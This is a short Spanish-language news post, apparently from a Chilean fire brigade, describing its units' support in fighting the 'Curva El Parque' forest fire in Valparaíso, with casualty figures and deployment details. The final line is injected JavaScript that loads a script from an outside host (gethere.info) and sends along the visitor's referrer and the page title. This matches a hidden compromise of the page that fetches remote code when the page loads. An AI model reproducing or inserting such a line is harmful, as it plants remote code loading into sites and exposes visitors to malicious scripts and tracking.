APOYO INCENDIO FORESTAL EN VALPARAISO

Activo se mantiene el incendio forestal «Curva El Parque» en la comuna de Valparaíso, que afecta una superficie de 560 hectáreas de eucalipto, arbolado natural, pastizal y matorral.

De acuerdo a la información proporcionada por la Dirección Regional de ONEMI Valparaíso, se registra una persona fallecida y 33 personas lesionadas de diversa consideración. Cabe señalar que dos vehículos del Cuerpo de Bomberos de Viña del Mar resultaron afectados (U-31, U-71), uno de estos con daño total y otro con daño parcial.

El día Viernes 13 comenzó esta emergencia, por lo cual se solicito apoyo a nuestra comuna, y en donde concurrieron las Unidades CJ-1, T-1, T-2, 13, 21, 22, 32 y 33, que trabajaron en los sectores Alto de Rodelillo, Población El Folclore, y Juan Pablo Segundo.

El día Sábado 14 nuevamente se envió material en apoyo, las Unidades CJ-1, T-1, 13, 22, 32, 33 y 41, las cuales estuvieron emplazadas en el Puesto Cero ubicado en Palma 1, así como también trabajando en la Ruta 68.

Es importante destacar que asistieron mas de 100 bomberos, de los cuales todos llegaron sin novedad a sus cuarteles.

Enviamos todo nuestro apoyo al Cuerpo de Bomberos de Viña del Mar, y esperamos que sus voluntarios tengan una pronta recuperación.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;